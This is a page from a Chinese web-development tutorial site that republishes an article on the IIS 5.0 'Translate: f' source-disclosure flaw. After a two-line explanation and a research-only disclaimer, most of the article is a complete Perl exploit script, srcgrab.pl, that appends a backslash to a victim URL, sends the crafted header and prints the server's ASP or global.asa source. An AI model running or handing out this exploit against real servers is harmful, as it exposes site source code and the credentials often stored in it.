频道直达 - 学院 - 下载 - 交易 - 特效 - 字库 - 手册 -排名-工具- 繁體
网页教学网站开发 设为首页
加入收藏
联系我们
建站搜索: 常用广告代码   用户注册 | 用户登陆
您当前的位置:中国建站之家 -> 网站开发设计技术教程 -> asp教程 -> iis5的asp泄露

iis5的asp泄露
作者:佚名  来源:转载  发布时间:2005-7-18 16:38:11  发布人:acx

减小字体 增大字体

iis5的asp泄露

当 IIS 5.0 接收到一个特殊格式的头 (Translate: f) 的 HTTP 请求,同时 UR
L 末尾包含一个特殊字符时,IIS 会使用错误的处理方法导致文件源代码泄漏。


以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自


#!/usr/bin/perl
# Expl0it By smiler@vxd.org
# Tested with sucess against IIS 5.0. Maybe it works against IIS 4.0 u
sing a shared drive but I haven磘 tested it yet.
# Get the source code of any script from the server using this exploit
.
# This code was written after Daniel Docekal brought this issue in Bug
Traq.
# Cheers 351 and FractalG :)

if (not $ARGV[0]) {
print qq~
Geee it磗 running !! kewl :)))
Usage : srcgrab.pl Example Usage : srcgrab.pl http://www.victimsite.co
m/global.asa
U can also save the retrieved file using : srcgrab.pl http://www.victi
m.com/default.asp > file_to_save
~; exit;}



$victimurl=$ARGV[0];

# Create a user agent object
use LWP::UserAgent;
$ua = new LWP::UserAgent;

# Create a request
my $req = new HTTP::Request GET => $victimurl . ''\\''; # Here is the ba
ckslash at the end of the url ;)
$req->content_type(''application/x-www-form-urlencoded'');
$req->content_type(''text/html'');
$req->header(Translate => ''f''); # Here is the famous translate header
:))
$req->content(''match=www&errors=0'');

# Pass request to the user agent and get a response back
my $res = $ua->request($req);

# Check the outcome of the response
if ($res->is_success) {
print $res->content;
} else {
print $res->error_as_HTML;
}


将本文收藏到QQ书签与更多好友分享
[打 印]
[] [返回上一页] [收 藏]
∷相关文章评论∷    (评论内容只代表网友观点,与本站立场无关!) [更多评论...]
精彩推荐
热门文章
· 注册码大全二
· 注册码大全四
· 注册码大全一
· 要10G免费网络硬盘的请进..
· 通过google 赶快来赚美金..
· 注册码大全十
· 头像-qq头像(qq新头像)4..
· 让你轻松架设FTP服务器1..
· 注册码大全三
· 梦幻背景图片7
· 卡通动物图片6
· 网页制作素材-按钮素材2..
· 让你轻松架设FTP服务器5..
· 风景图片8
· 注册码大全九
· 让你轻松架设FTP服务器2..
关注此文读者还看过
· XmlHttp对象及其方法
· ReDim语句
· jsp文件操作之读取篇
· 首届行业网站的年会闭幕..
· 在oracle中限制返回结果..
· 如何用QQ发超大汉字
· 正则表达式中的特殊字符..
· net 页面怎样内嵌media ..
· PHP中类的理解和应用[二..
· 用ASP代码得到客户端IP和..
· 一次性下载远程页面上的..
· 程序员眼中的Flash MX20..
· ASP生成静态Html文件技术..
· SQL Server数据库技术(..
· Fireworks8绘制神秘的太..
· 无刷新聊天室的技术实现..
相关文章
· 如何安装微软IIS5.1安装文件..
· IIS5 + ADO 2.5新先睹为快技..
· 解决IIS5 HTTP500内部错误
· IIS5 UNICODE 编码漏洞的利..
· IIS5 UNICODE 编码漏洞的利..
· 整合Tomcat5和IIS5 及正常打..
· WINDOWS 2000搭載ASP3.0和I..
· IIS5 + ADO 2.5新先睹为快技..
· IIS5 + ADO 2.5新先睹为快技..
· 把PHP4安装到Win2000的IIS5..
· WINDOWS 2000搭載ASP3.0和I..
· IIS5 + ADO 2.5新先睹为快技..
· IIS5 + ADO 2.5新先睹为快技..
· 已经装了WIN2000和IIS5以及..
· 有关win2000、IIS5中asp详细..
· IIS5 HTTP500内部错误解决办..
关于本站 - 网站帮助 - 广告合作 - 下载声明 - 友情连接 - 网站地图 - 人才招聘
网站合作、内容监督、商务咨询:QQ: 9576619
Copyright ? 2005--2008 中国建站之家版权所有
粤ICP备05092265号